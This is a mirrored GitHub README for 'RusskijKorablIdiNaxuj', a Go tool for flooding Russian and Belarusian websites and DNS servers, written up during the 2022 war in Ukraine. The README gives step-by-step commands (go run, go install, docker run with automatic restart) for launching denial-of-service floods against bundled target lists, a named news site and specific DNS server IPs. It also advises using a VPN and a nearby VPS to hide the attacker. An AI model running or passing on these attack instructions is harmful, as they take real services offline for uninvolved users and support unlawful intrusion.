Giter Club home page Giter Club logo

russkijkorablidinaxuj's Introduction

Github All Releases Go Report Card Build@release Tests@main

Hi there 👋

If this repo becomes taken down, then it is a sign that GitHub supports war atrocities commited by putin!

IMPORTANT!!! Please take your security seriously and use VPN while running this software from your own devices(PC/Laptop/Android/etc)!

NOTE: Since this app is not signed by any certificate for obvious reasons, Windows Defender will complain that this app is from an unknown source. It is safe to run this app anyway unless it was downloaded from another location. In which case the app may be altered, so be vigilant and compare the hashes of your binaries!

GUI

This repository was created in order to help defend against Russia propaganda during the war activities of Russian armies in Ukraine 2022.

There are two variants of the program:

  • GUI
  • CLI

For GUI simply download the latest program for your operating system from the Releases section. It is possible to run CLI program using Docker.

Usage

Desktop App

  • RusskijKorablIdiNaxuj.exe.zip for Windows platforms
  • RusskijKorablIdiNaxuj.apk for Android platforms
  • RusskijKorablIdiNaxuj.tar.xz for Linux platforms
  • Please build manually for Mac-OS.

After executing the binary there will be a window similar to the one in the screenshot above. If you have a less formidable PC, then reduce "Workers" number to something like 500. Then you can click on the little triangle on the right and start the process.

NOTE: Windows may complain that the app is not signed or from unknown publisher. This is normal since it was not signed by a legitimate Windows certificate for obvious reasons(well, developers must register and obtain this certificate from Microsoft when they want to publish their apps).

Command line

Just clone this repo, install Go and from clonned directory do (preferrably on a VPS that is close to Russia):

go run ./cmd/RusskijKorablIdiNaxuj-cli -i targets/targets.txt

Also, you can install the GUI executable using this command(although you will still need Fyne dependencies for your system):

go install github.com/RusskijKorablIdiNaxuj/RusskijKorablIdiNaxuj@latest

Or the following command for the cli version:

go install github.com/RusskijKorablIdiNaxuj/RusskijKorablIdiNaxuj/cmd/RusskijKorablIdiNaxuj-cli@latest

NOTE: It may consume a lot of RAM as it tries to leave connections open for a as long time as possible. Minimum 4GB is needed.

Docker

You can run docker for all targets at the same time using this command:

docker run -d --restart unless-stopped ghcr.io/russkijkorablidinaxuj/russkijkorablidinaxuj:latest

If it is crashing due to OOM:

docker run -d --restart unless-stopped ghcr.io/russkijkorablidinaxuj/russkijkorablidinaxuj:latest -N 1000

You can also specify different target lists using -i app/{target}.json, where {target} can be one of:

  • all.json
  • belarus.json
  • russia.json
  • api.json
  • dns.json

It is possible to see attack progress using this command:

docker run -i --restart unless-stopped ghcr.io/russkijkorablidinaxuj/russkijkorablidinaxuj:latest -N 1000 -i /app/dns.json -s=false

The output will be something like this:

root@putinhujlo-ch1:~/RusskijKorablIdiNaxuj# docker run -i --restart unless-stopped ghcr.io/russkijkorablidinaxuj/russkijkorablidinaxuj:latest -N=5000 -i /app/dns.json -s=false
dns://194.54.14.186:53  0 % [---------------------------] 0 / -1
dns://194.54.14.186:53   5 % [>--------------------]  193 / 3978
dns://194.54.14.187:53   6 % [>--------------------]  226 / 3685
dns://194.67.7.1:53     94 % [===================>-] 4993 / 5284
dns://194.67.2.109:53   90 % [==================>--] 3058 / 3414

The progress bar shows how many timeouts there are relative to the requests per second. The higher this ratio to 100% the better!

NOTE: You can also specify single targets using -i command, e.g. -i https://tass.ru/ (it must have either http or https. Also, dns:// works too for dns query flood)

Important resources

Contribute targets/Code

Either create an issue or a PR.

russkijkorablidinaxuj's People

Contributors

russkijkorablidinaxuj avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar

russkijkorablidinaxuj's Issues

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.